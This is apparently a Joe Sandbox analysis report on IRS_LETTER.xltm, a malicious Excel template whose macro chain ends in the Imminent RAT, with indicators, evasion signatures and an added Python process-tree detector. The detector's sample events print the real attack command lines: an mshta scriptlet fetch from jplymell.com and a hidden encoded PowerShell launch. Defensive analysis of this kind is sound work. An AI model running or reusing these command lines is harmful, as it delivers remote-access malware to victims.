ID: 192261
Sample Name: IRS_LETTER.xltm
Cookbook: defaultwindowsofficecookbook.jbs
Time: 20:57:24
Date: 26/11/2019
Version: 28.0.0 Lapis Lazuli

Table of Contents

Analysis Report IRS_LETTER.xltm 5
  Overview 5
    General Information 5
    Detection 6
    Confidence 6
    Classification 7
    Analysis Advice 7
    Mitre Att&ck Matrix 7
    Signature Overview 8
      AV Detection 8; Vulnerabilities 9; Networking 9; E-Banking Fraud 9; System Summary 9; Data Obfuscation 10; Persistence and Installation Behavior 10; Boot Survival 10; Hooking and other Techniques for Hiding and Protection 10; Malware Analysis System Evasion 10; Anti Debugging 10; HIPS / PFW / Operating System Protection Evasion 10; Language, Device and Operating System Detection 10; Lowering of HIPS / PFW / Operating System Security Settings 11; Stealing of Sensitive Information 11; Remote Access Functionality 11
    Behavior Graph 11
    Simulations 11
      Behavior and APIs 11
    Antivirus, Machine Learning and Genetic Malware Detection 12
      Initial Sample 12; Dropped Files 12; Unpacked PE Files 12; Domains 12; URLs 12
    Yara Overview 13
      Initial Sample 13; PCAP (Network Traffic) 13; Dropped Files 13; Memory Dumps 13; Unpacked PEs 14
    Sigma Overview 14
      System Summary 14
    Joe Sandbox View / Context 14
      IPs 14; Domains 15; ASN 15; JA3 Fingerprints 16; Dropped Files 16
    Screenshots 16
      Thumbnails 16
  Startup 17
  Created / dropped Files 18
  Domains and IPs 25
    Contacted Domains 25; URLs from Memory and Binaries 25; Contacted IPs 30 (Public 30)
  Static File Info 31
    General 31; File Icon 31
    Static OLE Info 31
      General 31
      OLE File "xl/vbaProject.bin" 31
        Indicators 31
        Streams with VBA 31
          VBA File Name: Sheet1.cls, Stream Size: 977 31 (General 31; VBA Code Keywords 32; VBA Code 32)
          VBA File Name: TNXiUBqrSCXLbjLDqiGJRqg.frm, Stream Size: 1176 32 (General 32; VBA Code Keywords 32; VBA Code 32)
          VBA File Name: ThisWorkbook.cls, Stream Size: 1815 32 (General 32; VBA Code Keywords 33; VBA Code 33)
        Streams 33
          PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 568 33
          PROJECTwm, File Type: data, Stream Size: 134 33
          TNXiUBqrSCXLbjLDqiGJRqg/\x1CompObj, File Type: data, Stream Size: 97 34
          TNXiUBqrSCXLbjLDqiGJRqg/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 457 34
          TNXiUBqrSCXLbjLDqiGJRqg/f, File Type: data, Stream Size: 242 34
          TNXiUBqrSCXLbjLDqiGJRqg/i01/\x1CompObj, File Type: data, Stream Size: 112 34
          TNXiUBqrSCXLbjLDqiGJRqg/i01/f, File Type: data, Stream Size: 56 35
          TNXiUBqrSCXLbjLDqiGJRqg/i01/o, File Type: empty, Stream Size: 0 35
          TNXiUBqrSCXLbjLDqiGJRqg/o, File Type: empty, Stream Size: 0 35
          VBA/_VBA_PROJECT, File Type: data, Stream Size: 3458 35
          VBA/dir, File Type: 88K BCS executable, Stream Size: 881 35
  Network Behavior 36
    Network Port Distribution 36; TCP Packets 36; UDP Packets 38; DNS Queries 38; DNS Answers 38; HTTPS Packets 38
  Code Manipulations 39
  Statistics 39
    Behavior 39
  System Behavior 39
    Analysis Process: EXCEL.EXE PID: 3896 Parent PID: 700 39 (General 39; File Activities 40: File Created 40, File Deleted 40, File Written 40; Registry Activities 49: Key Created 49, Key Value Created 49)
    Analysis Process: rundll32.exe PID: 2752 Parent PID: 3896 50 (General 50; File Activities 50)
    Analysis Process: mshta.exe PID: 5072 Parent PID: 2752 50 (General 50; File Activities 51)
    Analysis Process: cmd.exe PID: 980 Parent PID: 5072 51 (General 51; File Activities 52)
    Analysis Process: conhost.exe PID: 4384 Parent PID: 980 52 (General 52)
    Analysis Process: powershell.exe PID: 4500 Parent PID: 980 52 (General 52; File Activities 53: File Created 53, File Deleted 54, File Written 54, File Read 57; Registry Activities 59)
    Analysis Process: Silvepurity.exe PID: 2816 Parent PID: 4500 59 (General 59; File Activities 59: File Created 59, File Deleted 60, File Written 60, File Read 61)
    Analysis Process: schtasks.exe PID: 1728 Parent PID: 2816 62 (General 62; File Activities 62: File Read 62)
    Analysis Process: conhost.exe PID: 5076 Parent PID: 1728 62 (General 62)
    Analysis Process: Silvepurity.exe PID: 4264 Parent PID: 2816 62 (General 62; File Activities 63: File Created 63, File Deleted 64, File Written 64, File Read 66; Registry Activities 67: Key Created 67, Key Value Created 67)
  Disassembly 67
    Code Analysis 67

Copyright Joe Security LLC 2019

Analysis Report IRS_LETTER.xltm

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 192261
Start date: 26.11.2019
Start time: 20:57:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 51s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: IRS_LETTER.xltm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, GSI enabled (VBA), AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLTM@17/26@4/2
EGA Information: Successful, ratio: 20%
HDC Information: Successful, ratio: 4% (good quality ratio 1.9%); Quality average: 31.4%; Quality standard deviation: 36.3%
HCA Information: Successful, ratio: 98%; Number of executed functions: 0; Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .xltm; Found Word or Excel or PowerPoint or XPS Viewer; Attach to Office via COM; Scroll down; Close Viewer

Warnings:
  Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe, WmiPrvSE.exe, WmiApSrv.exe
  TCP Packets have been reduced to 100
  Excluded IPs from analysis (whitelisted): 52.109.88.8, 13.107.3.128, 13.107.5.88, 52.109.88.35, 52.114.128.8
  Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, afdo-tas-offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, s-0001.s-msedge.net, mobile.pipe.aria.microsoft.com, e-0009.e-msedge.net, prod.nexusrules.live.com.akadns.net, prd.col.aria.mobile.skypedata.akadns.net, pipe.skype.com, config.officeapps.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, config.edge.skype.com, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, pipe.cloudapp.aria.akadns.net
  Execution Graph export aborted for target EXCEL.EXE, PID 3896 because there are no executed functions
  Execution Graph export aborted for target Silvepurity.exe, PID 2816 because it is empty
  Execution Graph export aborted for target mshta.exe, PID 5072 because there are no executed functions
  Execution Graph export aborted for target powershell.exe, PID 4500 because it is empty
  Report size exceeded maximum capacity and may have missing behavior information.
  Report size getting too big, too many NtAllocateVirtualMemory calls found.
  Report size getting too big, too many NtDeviceIoControlFile calls found.
  Report size getting too big, too many NtOpenKeyEx calls found.
  Report size getting too big, too many NtProtectVirtualMemory calls found.
  Report size getting too big, too many NtQueryAttributesFile calls found.
  Report size getting too big, too many NtQueryValueKey calls found.
  Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy: Threshold | Score: 100 | Range: 0 - 100 | Whitelisted: false | Threat: Imminent

Confidence

Strategy: Threshold | Score: 5 | Range: 0 - 5 | Further Analysis Required?: false

Classification

(The classification radar chart of the original report is an image; the information it carries:)
Result: malicious (score 100)
Chart axes: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware
Scale: clean / suspicious / malicious

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

The matrix is listed here column by column. A number after a technique is the count of matching signatures in the original's superscript; entries without a number are the matrix's default placeholders for which no behaviour was observed.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment; Spearphishing via Service; Supply Chain Compromise; Trusted Relationship; Hardware Additions

Execution: Windows Management Instrumentation 1 2 1; Rundll32 1; PowerShell 3; Scripting 1 1; Exploitation for Client Execution 1; Command-Line Interface 1; Scheduled Task 1; Third-party Software; Rundll32; PowerShell; Execution through API

Persistence: Scheduled Task 1; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service; Path Interception; Logon Scripts; DLL Search Order Hijacking; Change Default File Association; File System Permissions Weakness; New Service

Privilege Escalation: Access Token Manipulation 1; Process Injection 1 1 2; Scheduled Task 1; DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task; Process Injection; Service Registry Permissions Weakness; Exploitation for Privilege Escalation; Valid Accounts; Bypass User Account Control

Defense Evasion: Software Packing 3; Disabling Security Tools 1; Deobfuscate/Decode Files or Information 1; Rundll32 1; Scripting 1 1; File Deletion 1; Obfuscated Files or Information 2; Masquerading 1 1; Virtualization/Sandbox Evasion 2; Access Token Manipulation 1; Process Injection 1 1 2; DLL Side-Loading 1

Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception; Bash History; Input Prompt; Keychain; Private Keys; Securityd Memory

Discovery: Security Software Discovery 2 3 1; File and Directory Discovery 2; System Information Discovery 1 6; Process Discovery 2; Application Window Discovery 1; Remote System Discovery 1; System Network Configuration Discovery 1; Network Service Scanning; System Network Connections Discovery; Process Discovery; Security Software Discovery; Permission Groups Discovery

Lateral Movement: Remote File Copy 1; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash; Remote Desktop Protocol; Windows Admin Shares; Taint Shared Content; Replication Through Removable Media; Pass the Ticket

Collection: Email Collection 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged; Screen Capture; Email Collection; Clipboard Data; Automated Collection; Audio Capture; Video Capture; Man in the Browser

Exfiltration: Data Encrypted 1 1; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Physical Medium; Transfer Data to Cloud Account

Command and Control: Uncommonly Used Port; Commonly Used Port; Remote File Copy 1; Standard Cryptographic Protocol 1; Remote Access Tools 1; Standard Non-Application Layer Protocol 2; Standard Application Layer Protocol 2; Standard Application Layer Protocol; Multilayer Encryption; Connection Proxy; Communication Through Removable Media; Custom Command and Control Protocol

Signature Overview

• AV Detection
• Software Vulnerabilities
• Networking
• E-Banking Fraud
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Stealing of Sensitive Information
• Remote Access Functionality

AV Detection:

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Imminent

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Networking:

May check the online IP address of the machine

Detected TCP or UDP traffic on non-standard ports

Domain name seen in connection with other malware

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to download additional files from the

Found strings which match to known social media urls

Performs DNS lookups

Urls found in memory or binary data

Uses HTTPS

E-Banking Fraud:

Yara detected Imminent

System Summary:

Malicious sample detected (through community Yara rule)

Document contains an embedded VBA macro with suspicious strings

Powershell drops PE file

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Yara signature match

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Classification label

Contains functionality to adjust token privileges (e.g. debug / backup)

Creates files inside the user directory

Creates mutexes

Creates temporary files

Parts of this application are using the .NET runtime (probably coded in C#)

Queries process information (via WMI, Win32_Process)

Reads ini files

Reads software policies

Reads the hosts file

Runs a DLL by calling functions

SQL strings found in memory and binary data

Sample is known by Antivirus

Spawns processes

Uses an in-process (OLE) Automation

Writes ini files

Reads settings

Executable creates window controls seldom found in malware

Found graphical window changes (likely an installer)

Uses Microsoft Silverlight

Checks if Microsoft Office is installed

Uses new MSVCR Dlls

Binary contains paths to debug symbols

Data Obfuscation:

PowerShell case anomaly found

Uses code obfuscation techniques (call, push, ret)

Binary may include packed or encrypted code

Persistence and Installation Behavior:

Drops PE files

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Disables application error messages (SetErrorMode)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Yara detected Cassandra Crypter

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to query system information

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Queries a list of all running processes

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Enables debug privileges

Creates guard pages, often used to prevent reverse engineering and debugging

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Injects a PE file into a foreign processes

Creates a process in suspended mode (likely to inject code)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May try to detect the Windows Explorer process (often used for injection)

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Queries the cryptographic machine GUID

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Stealing of Sensitive Information:

Yara detected Imminent

Remote Access Functionality:

Detected Imminent RAT

Yara detected Imminent

Contains functionality to start a terminal service

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Behavior Graph

(The behavior graph of the original report is an image; the information recoverable from it:)

ID: 192261
Sample: IRS_LETTER.xltm
Startdate: 26/11/2019
Architecture: WINDOWS
Score: 100

Top-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; 14 other signatures

Process chain (counts are files created / registry values created as shown on the graph nodes):
EXCEL.EXE (76 files, 55 registry values)
  dropped: C:\Users\user\Desktop\~$IRS_LETTER.xltm (data); C:\Users\...\6A10AB79.tmp:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\6A10AB79.tmp (Microsoft)
  started rundll32.exe (1 file) - Document exploit detected (process start blacklist hit)
    started mshta.exe (14 files) - PowerShell case anomaly found
      DNS/IP: linkadrum.nl; jplymell.com -> 185.223.28.211, port 443 (source ports 49722, 49723), ASN unknown, Germany
      started cmd.exe (1 file) - Encrypted powershell cmdline option found; PowerShell case anomaly found
        started conhost.exe
        started powershell.exe (15 files, 20 registry values) - Powershell drops PE file
          dropped: C:\Users\user\AppData\Local\Silvepurity.exe (PE32)
          started Silvepurity.exe (6 files) - Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file; Injects a PE file into a foreign processes
            dropped: C:\Users\user\AppData\...\tjInWEsrJITP.exe (PE32); C:\Users\user\AppData\Local\...\tmpB5CB.tmp (XML)
            started Silvepurity.exe (15 files, 13 registry values) - Hides that the sample has been downloaded from the Internet (zone.identifier); Deletes itself after installation
              DNS/IP: iptrackeronline.com; www.iptrackeronline.com -> 45.55.57.244, port 443 (source port 49725), ASN unknown, United States
            started schtasks.exe (1 file)
              started conhost.exe

Simulations

Behavior and APIs

Time | Type | Description
20:58:50 | API Interceptor | 30x Sleep call for process: powershell.exe modified
20:58:54 | API Interceptor | 2802x Sleep call for process: Silvepurity.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
IRS_LETTER.xltm | 11% | Virustotal |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6A10AB79.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\tjInWEsrJITP.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Silvepurity.exe | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
12.2.Silvepurity.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen

Domains

Source | Detection | Scanner | Label
jplymell.com | 8% | Virustotal |
linkadrum.nl | 8% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://jplymell.com | 1% | Virustotal |
https://jplymell.com | 0% | Avira URL Cloud | safe
https://api.aadrm.com/ | 0% | Virustotal |
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://jplymell.com/rootweb/applepeg.jpg | 0% | Avira URL Cloud | safe
www.zhongyicts.com.cn | 0% | Virustotal |
www.zhongyicts.com.cn | 0% | URL Reputation | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | Virustotal |
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Virustotal |
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://jplymell.com/serb.xml | 10% | Virustotal |
https://jplymell.com/serb.xml | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
pesterbdd.com/images/Pester.png | 0% | Virustotal |
pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
cps.letsencrypt.org0 | 0% | URL Reputation | safe
https://wus2-000.pagecontentsync. | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | Virustotal |
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://jplymell.com/serb.xml))H | 0% | Avira URL Cloud | safe
https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionsFlag | 0% | Avira URL Cloud | safe
ad.double(. | 0% | Avira URL Cloud | safe
https://substrate.office.comrlg | 0% | Avira URL Cloud | safe
www.carterandcone.coml | 0% | URL Reputation | safe
https://graph.windows.netx | 0% | Avira URL Cloud | safe
https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci. | 0% | Avira URL Cloud | safe
https://settings.outlook.com( | 0% | Avira URL Cloud | safe
https://incidents.diagnostics.office.comODSIncidentsSdfUrlhttps://incidents.diagnosticssdf.office.co | 0% | Avira URL Cloud | safe
https://devnull.onenote.comMBI_SSL_SHORT | 0% | URL Reputation | safe
https://outlook.office.com( | 0% | Avira URL Cloud | safe
https://powerlift.acompli.netx$( | 0% | Avira URL Cloud | safe
www.founder.com.cn/cn/bThe | 0% | Virustotal |
www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetectnAutoDetectTestAPIUrlhttps://dev0-api.acompli.n | 0% | Avira URL Cloud | safe
https://www.odwebp.svc.msol | 0% | Avira URL Cloud | safe
schemas.micro | 0% | URL Reputation | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\serb[1].xml | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x192:$s1: pOweRsHeLL

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.1809873177.0000000002D72000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x9828:$s1: pOweRsHeLL
0000000C.00000002.2270037428.0000000002C40000.00000004.00000001.sdmp | JoeSecurity_Imminent | Yara detected Imminent | Joe Security |
00000006.00000002.1841384782.00000000090E5000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x2e9c, 0x429e, 0x5b52, 0x6a8c, 0x7408: $s1: pOweRsHeLL
00000003.00000003.1810136216.0000000002D35000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x1528d:$s1: pOweRsHeLL
00000003.00000003.1809303287.00000000059B1000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0xeb6, 0x29fe, 0x3f66, 0x67fa, 0x74a6, 0x836a: $s1: pOweRsHeLL
00000003.00000002.1813680366.0000000002D35000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x1528d:$s1: pOweRsHeLL
00000003.00000002.1813301119.0000000002BC0000.00000004.00000020.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x718e:$s1: pOweRsHeLL
00000003.00000003.1809551068.0000000002D6D000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0xe828:$s1: pOweRsHeLL
00000006.00000002.1828690340.0000000000E20000.00000004.00000040.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x1570:$s1: pOweRsHeLL
00000003.00000002.1814187337.0000000002D73000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x8828:$s1: pOweRsHeLL
00000003.00000003.1810261279.0000000002D35000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x1528d:$s1: pOweRsHeLL
00000003.00000002.1818513629.0000000005D70000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x10502, 0x10f6e, 0x1199a: $s1: pOweRsHeLL
00000003.00000003.1809810062.0000000002D35000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x1528d:$s1: pOweRsHeLL
Process Memory Space: Silvepurity.exe PID: 4264 | JoeSecurity_Imminent | Yara detected Imminent | Joe Security |
Process Memory Space: Silvepurity.exe PID: 2816 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
Process Memory Space: Silvepurity.exe PID: 2816 | JoeSecurity_CassandraCrypter | Yara detected Cassandra Crypter | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
12.2.Silvepurity.exe.400000.0.unpack | Imminent_1 | Imminent Payload | kevoreilly | 0x4f395:$string1: Imminent-Monitor; 0x4f2c9:$string2: [email protected]; 0x4f799:$string3: SevenZipHelper; 0x4f8b0:$string4: get_EntryPoint; 0x4fbd7:$string5: WrapNonExceptionThrows

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Possible Applocker Bypass
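The three Sigma titles above correspond to parent/child relations visible in the Startup section: EXCEL.EXE spawning rundll32.exe, mshta.exe spawning cmd.exe, and mshta.exe appearing on command lines. The Python below is an added example, not part of the Joe Sandbox report or of the Sigma project; its checks are my approximation of what those rule titles cover, not the published rules' exact selectors, and it adds one check of my own for the GetObject("script:https://...") scriptlet moniker that rundll32.exe hands to mshta.exe here. The events are constructed from the Startup section; the explorer.exe root process and the full powershell.exe command line are assumptions the report does not show.

```python
import os
import re
from typing import List, Tuple

# Constructed process-creation events (pid, ppid, image, command line) following the
# Startup section of this report. The explorer.exe root and the powershell.exe command
# line are assumptions: the report shows neither in full. The base64 payload is elided.
EVENTS = [
    (700, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (3896, 700, r"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE",
     r"'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding"),
    (2752, 3896, r"C:\Windows\System32\rundll32.exe",
     "rUNDlL32.eXe SHELL32.DLL,ShellExec_RunDLL mSHta.Exe VbsCripT:CLOSe "
     "(geTObJEct ('SCRipT:https://jplymell.com/serb.xml') )"),
    (5072, 2752, r"C:\Windows\System32\mshta.exe",
     r"'C:\Windows\system32\mSHta.Exe' VbsCripT:CLOSe (geTObJEct ('SCRipT:https://jplymell.com/serb.xml') )"),
    (980, 5072, r"C:\Windows\System32\cmd.exe",
     r"'C:\Windows\system32\cmd.exe' '/c pOweRsHeLL.Exe -eX uNRestRictED -Nop -W HiDDEn -ec <base64 elided>'"),
    (4384, 980, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0x4"),
    (4500, 980, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "pOweRsHeLL.Exe -eX uNRestRictED -Nop -W HiDDEn -ec <base64 elided>"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe", "visio.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
          "rundll32.exe", "regsvr32.exe", "wmic.exe", "schtasks.exe", "msiexec.exe", "hh.exe"}
MSHTA_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "reg.exe", "regsvr32.exe", "bitsadmin.exe"}
# Binaries whose presence on a command line is the usual signal for AppLocker-bypass
# rules; mshta.exe is the one that fires for this sample.
LOLBINS = ("msdt.exe", "installutil.exe", "regsvcs.exe", "regasm.exe",
           "regsvr32.exe", "msbuild.exe", "ieexec.exe", "mshta.exe")
# COM scriptlet moniker: GetObject("script:https://...") fetches and runs remote script code.
SCRIPTLET_RE = re.compile(r"script:https?://", re.IGNORECASE)


def image_name(path: str) -> str:
    """Case-folded basename; os.path.basename does not split backslashes off Windows."""
    return os.path.basename(path.replace("\\", "/")).lower()


def detect(events) -> List[Tuple[str, int]]:
    """Evaluate each process against its parent and return (rule, pid) hits."""
    by_pid = {pid: (ppid, image_name(image), cmdline.lower())
              for pid, ppid, image, cmdline in events}
    hits = []
    for pid, (ppid, image, cmdline) in by_pid.items():
        parent = by_pid[ppid][1] if ppid in by_pid else ""
        if parent in OFFICE and image in SHELLS:
            hits.append(("office_spawning_shell", pid))
        if parent == "mshta.exe" and image in MSHTA_CHILDREN:
            hits.append(("mshta_spawning", pid))
        if any(lolbin in cmdline for lolbin in LOLBINS):
            hits.append(("applocker_bypass", pid))
        if image in ("mshta.exe", "rundll32.exe") and SCRIPTLET_RE.search(cmdline):
            hits.append(("remote_scriptlet_moniker", pid))
    return sorted(hits)


def ancestry(events, pid: int) -> List[str]:
    """Image names from the outermost known ancestor down to pid."""
    by_pid = {p: (pp, image_name(img)) for p, pp, img, _ in events}
    names = []
    while pid in by_pid:
        pid, name = by_pid[pid][0], by_pid[pid][1]
        names.append(name)
    return names[::-1]


if __name__ == "__main__":
    print(" -> ".join(ancestry(EVENTS, 4500)))
    for rule, pid in detect(EVENTS):
        print(f"{rule:26s} pid={pid}")
```

Evaluating on the parent's image rather than on the child's command line is what keeps conhost.exe and powershell.exe quiet here: both are ordinary children of cmd.exe, and the only thing unusual about them is the chain above them, which ancestry() makes visible in one line.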

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
45.55.57.244 | 38PO.exe | malicious |
45.55.57.244 | 57DHL AWB #9377.exe | malicious |
45.55.57.244 | 21file1253634_Protected.exe | malicious |
45.55.57.244 | 15OrderList_Inquiry.exe | malicious |
45.55.57.244 | 70payment $37,140.exe | malicious |
45.55.57.244 | Software.exe | malicious |
45.55.57.244 | 15Sept PO.doc | malicious |
45.55.57.244 | 18Products List.doc | malicious |
45.55.57.244 | 2618212_01_CARTE.doc | malicious |
45.55.57.244 | 44swift copy.exe | malicious |
45.55.57.244 | Registraduria Nacional del Estado Civil -Proceso inicado.doc | malicious |
45.55.57.244 | Registraduria Nacional del Estado Civil -Proceso inicado.doc | malicious |
45.55.57.244 | 75TTcopy_payment10000$.exe | malicious |
45.55.57.244 | 1d8.doc | malicious |
45.55.57.244 | 63purchase order.exe | malicious |
45.55.57.244 | 29Purchase Details Quotation.exe | malicious |
45.55.57.244 | 69RENEWAL OF PROFESSIONAL INDEMNITY INSURANCE POLICY-KELVIC.pd.exe | malicious |
45.55.57.244 | 57TP DSA database.xls.exe | malicious |
45.55.57.244 | Heating_Invoice.doc | malicious |
45.55.57.244 | 11VFBGTYR.js | malicious |
185.223.28.211 | IRS_LETTER.xltm | malicious |
185.223.28.211 | PO52P91df9bc210ac7cd131524cc_Invoice.xlsb | malicious |
185.223.28.211 | PO52P91df9bc210ac7cd131524cc_Invoice.xlsb | malicious |
185.223.28.211 | PO52P91df9bc210ac7cd131524cc_Invoice.xlsb | malicious |

Domains

Match | Associated Sample Name / URL | Detection | Context
iptrackeronline.com | 1d8.doc | malicious | 45.55.57.244
iptrackeronline.com | 63purchase order.exe | malicious | 45.55.57.244
